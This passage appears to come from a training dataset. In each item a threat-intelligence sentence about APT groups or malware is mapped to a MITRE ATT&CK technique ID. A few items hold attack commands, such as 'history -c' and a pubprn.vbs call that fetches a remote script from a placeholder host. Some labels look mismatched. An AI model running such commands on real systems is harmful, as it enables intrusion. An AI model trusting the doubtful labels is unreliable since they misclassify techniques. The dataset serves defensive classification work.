Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has cleared command history with history -c.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Vulnerability scans typically check if the configuration of a target host/application potentially aligns with the target of a specific exploit the adversary may seek to use.### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has also used tool named PICKPOCKET to dump passwords from web browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum's backdoor has used cmd.exe to execute arbitrary commands as well as batch scripts to update itself to a newer version.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some ZeroT DLL files have been packed with UPX.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may need to determine if the remote system is in a vulnerable state, which may be done through Network Service Scanning or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT17 has created profile pages in Microsoft TechNet that were used as C2 infrastructure.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has also used malware that utilizes zmap and zgrab to search for vulnerable services in cloud environments.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WindTail has the ability to decrypt strings using hard-coded AES keys.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has been known to pack their tools.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can gather information on the network configuration of a compromised host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has used an encrypted Virtual File System to store plugins.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has leveraged the BITSadmin command-line tool to create a job and launch a malicious process.### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Virtual dynamic shared object hijacking is a method of executing arbitrary code in the address space of a separate live process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Registry run key entries can reference programs directly or list them as a dependency.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries to load during execution time.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Andariel has inserted a malicious script within compromised websites to collect potential victim information such as browser type, system language, Flash Player version, and other data.### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DHS and FBI recommend that network administrators review the IP addresses, file hashes, network signatures, and YARA rules provided, and add the IPs to their watchlist to determine whether malicious activity has been observed within their organization.When reviewing network perimeter logs for the IP addresses, organizations may find numerous instances of these IP addresses attempting to connect to their systems### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once enumerated, the target processes’ memory map within /proc/pid/maps can be overwritten using dd.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More_eggs has used HTTP GET requests to check internet connectivity.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mivast has the capability to open a remote shell and run basic commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TSCookie has the ability to upload and download files to and from the infected host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GOLD SOUTHFIELD has conducted malicious spam campaigns to gain access to victim's machines.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang has used batch scripts in its malware to install persistence mechanisms.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Azure CLI also provides an interface to obtain user accounts with authenticated access to a domain.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emissary has the capability to create a remote shell and execute specified commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Matryoshka can establish persistence by adding a Scheduled Task named ""Microsoft Boost Kernel Optimization"".### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,All subsequent interaction with the C2 server uses the same SOAP web service, so we will not show all of the generated HTTP requests### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has set up Dropbox, Amazon S3, and Google Drive to host malicious downloads.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet can propagate via peer-to-peer communication and updates using RPC.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KeyBoy time-stomped its DLL in order to evade detection.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedID has used web injection attacks to redirect victims to spoofed sites designed to harvest banking and other credentials.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,..   After obtaining a session ID and pre-shared key, the PowerShell script will continue to communicate with its C2 server to obtain data to treat as a command### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TYPEFRAME has used ports 443, 8080, and 8443 with a FakeTLS method.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JPIN can list running services.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GravityRAT has used HTTP over a non-standard port, such as TCP port 46769.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volgmer can list directories on a victim.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth's initial payload is a malicious .LNK file.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can compress and archive collected files using WinRAR.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gorgon Group has obtained and used tools such as QuasarRAT and Remcos.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has scanned specific lists of target IP addresses.### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TRITON attempts to write a dummy program into memory if it fails to reset the Triconex controller.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has used native WINAPI calls.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Doki has used the DynDNS service and a DGA based on the Dogecoin blockchain to generate C2 domains.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkComet adds several Registry entries to enable automatic execution at every system startup.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Prior to Code Signing, adversaries may purchase or steal code signing certificates for use in operations.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GeminiDuke collects information on local user accounts from the victim.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Babuk can enumerate all services running on a compromised host.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,2, 2018, we published a blog detailing the use of an Adobe Flash zero-day vulnerability (CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper)### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent has used Rotate on Right and Rotate on Left functionality to encrypt strings.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has staged data remotely prior to exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LOWBALL uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SharpStage has the ability to create persistence for the malware using the Registry autorun key and startup folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has used batch files to initiate additional downloads of malicious files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has created a local user account with administrator privileges.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has exfiltrated collected host information to a C2 server.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Regin malware platform can use ICMP to communicate between infected computers.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OwaAuth web shell PDB string### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT has executed PowerShell commands via auto-run registry key persistence.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used web shells, often to maintain access to a victim network.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has decoded and decrypted its stages multiple times using hard-coded keys to deliver the final payload, and has decoded its server response hex string using XOR.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMess can use HTTP and HTTPS in C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Helminth establishes persistence by creating a shortcut in the Start Menu folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT30 has relied on users to execute malicious file attachments delivered via spearphishing emails.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dyre registers itself as a service by adding several Registry keys.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dark Caracal collected file listings of all default Windows directories.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DealersChoice uses HTTP for communication with the C2 server.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA551 has prompted users to enable macros within spearphishing attachments to install malware.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After decoding out the blob, analysts found a PowerShell script.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer uses heavily obfuscated code in its Windows Notepad backdoor.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has used tools to download malicious files to compromised hosts.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This marker indicates the presence of an encrypted MZ marker in the .hwp file and is decrypted by the malware and written to the Startup folder for the user: C:\Documents and Settings\\Start Menu\Programs\Startup\viso.exe This step establishes the persistence of the malware across reboots on the endpoint Once the decrypted MZ marker is written to the Startup folder, the 2.hwp is deleted from the endpoint The malware might perform this activity for a couple of reasons: Establish persistence for itself on the endpoint Establish persistence of another component of the malware on the endpoint Update itself on endpoint after a separate updater component downloads the update from the control server The malware has limited reconnaissance and data-gathering capabilities and is not full-fledged spyware### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NDiskMonitor can download and execute a file from given URL.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to obtain information about services: net start >> %temp%\download BRONZE BUTLER has used TROJ_GETVERSION to discover system services.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception used a file listing plugin to collect information about file and directories both on local and remote drives.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has used a tool to enumerate proxy settings in the target environment.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The account names visually look similar to legitimate government organization names or other trusted third-party entities### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBK has the ability to decrypt AES encrypted payloads.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.### Assistant: T1600: Weaken Encryption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedID has the ability to identify the computer name and OS version on a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilBunny has been observed querying installed antivirus software.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,New processes are typically spawned directly from their parent, or calling, process unless explicitly specified.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackTech has used spearphishing e-mails with links to cloud services to deliver malware.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly has used a scheduled task to execute a malicious file.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has exploited ZeroLogon against vulnerable domain controllers.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Doki has executed shell scripts with /bin/sh.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMail has been observed using TCP port 25, without using SMTP, to leverage an open port for secure command and control communications.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has been observed enumerating local processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET attempts to discover accounts from various locations such as a user's Evernote, AppleID, Telegram, Skype, and WeChat data.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pillowmint has used the NtQueueApcThread syscall to inject code into svchost.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has used UPX and Ezuri packer to pack its binaries.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37's Freenki malware lists running processes using the Microsoft Windows API.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBSRAT can delete files and directories.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 modified timestamps of backdoors to match legitimate Windows files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has extensively used strategic web compromises to target victims.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack has used process hollowing shellcode to target a predefined list of processes from %SYSTEM32%.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used a global service provider's IP as a proxy for C2 traffic from a victim.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If establishing persistence by installation as a new service fails, one variant of Elise establishes persistence for the created .exe file by setting the following Registry key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svchost : %APPDATA%\Microsoft\Network\svchost.exe.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used the Nirsoft SniffPass network sniffer to obtain passwords sent over non-secure protocols.### Assistant: T1040: Network Sniffing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Orangeworm has copied its backdoor across open network shares, including ADMIN$, C$WINDOWS, D$WINDOWS, and E$WINDOWS.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IndigoZebra has downloaded additional files and tools from its C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group malware has used rundll32 to launch additional malicious components.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has used several Windows API functions throughout the encryption process including IsDebuggerPresent, TerminateProcess, Process32FirstW, among others.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,yty collects the victim’s username.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,All strings below are encrypted via AES256 and base64 encoding### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon queries several Registry keys to identify hard disk partitions to overwrite.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Prior to version 10.5 on macOS, adversaries can add login items by using AppleScript to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The persona may exist on a single social media site or across multiple sites .### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Olympic Destroyer uses PsExec to interact with the ADMIN$ network share to execute commands on remote systems.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT1 has been known to use credential dumping using Mimikatz.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can collect the IP address of a compromised host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Virtualization drivers in order to gain kernel mode privileges.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These documents can be delivered via other techniques such as Phishing and/or Taint Shared Content and may evade static detections since no typical indicators are present until after the malicious payload is fetched.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may enumerate browser bookmarks to learn more about compromised hosts.### Assistant: T1217: Browser Bookmark Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GOLD SOUTHFIELD has used the cloud-based remote management and monitoring tool ""ConnectWise Control"" to deploy REvil.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many ZeroT samples can perform UAC bypass by using eventvwr.exe to execute a malicious file.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETEAGLE will attempt to detect if the infected host is configured to a proxy.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hi-Zor communicates with its C2 server over HTTPS.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can capture session logon details from a compromised host.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fysbis has been encrypted using XOR and RC4.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has injected malicious macros into all Word and Excel documents on mapped network drives.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may be used in persistent threat incidents as well as BEC incidents where an adversary can assign more access rights to the accounts they wish to compromise.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has used legitimate applications to side-load malicious DLLs.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CORESHELL can communicate over HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kinsing has used valid SSH credentials to access remote hosts.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell can kill AV products' processes.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Flame can use MS10-061 to exploit a print spooler vulnerability in a remote system with a shared printer in order to move laterally.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8's malicious spearphishing payloads are executed as PowerShell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used automated collection.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has a tool called CANDYKING to capture a screenshot of user's desktop.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy can obtain the current execution path as well as perform drive enumeration.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A module in Prikormka gathers logins and passwords stored in applications on the victims, including Google Chrome, Mozilla Firefox, and several other browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,YAHOYAH encrypts its configuration file using a simple algorithm.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Furthermore, this group has routinely identified and exploited vulnerable web servers of targeted organizations to install web shells, such as ANTAK and ASPXSPY, and used stolen legitimate credentials to compromise externally facing Outlook Web Access (OWA) resources### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has injected a DLL backdoor into dllhost.exe and svchost.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Threat Group-3390 tool can spawn svchost.exe and inject the payload into that process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot identifies processes and collects the process ids.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 uses a module to receive a notification every time a USB mass storage device is inserted into a victim.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke has been packed with junk code and strings.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has obtained and modified versions of publicly-available tools like Empire and PsExec.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used cmd.exe to execute commands on remote machines.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell can collect the owner and organization information from the target workstation.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GuLoader has the ability to download malware from Google Drive.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also target information about victim network-based intrusion detection systems or other appliances related to defensive cybersecurity operations.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The following screensaver settings are stored in the Registry and could be manipulated to achieve persistence: * SCRNSAVE.exe - set to malicious PE path * ScreenSaveActive - set to '1' to enable the screensaver * ScreenSaverIsSecure - set to '0' to not require a password to unlock * ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nomadic Octopus attempted to make Octopus appear as a Telegram Messenger with a Russian interface.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot creates a scheduled task on the system that provides persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has used MSbuild to execute an actor-created file.### Assistant: T1127: Trusted Developer Utilities Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FrameworkPOS can collect elements related to credit card data from process memory.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BACKSPACE achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct.### Assistant: T1216: Signed Script Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie executes BAT scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete's collected data is encrypted with AES before exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLACKCOFFEE has the capability to delete files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Whitefly has used Mimikatz to obtain credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Software packing is a method of compressing or encrypting an executable.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT sent username, computer name, and the previously generated UUID in reply to a ""who"" command from C2.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has collected a list of files from the victim and uploaded it to its C2 server, and then created a new list of specific files to steal.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bad Rabbit drops a file named infpub.datinto the Windows directory and is executed through SCManager and rundll.exe.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT decodes many of its artifacts and is 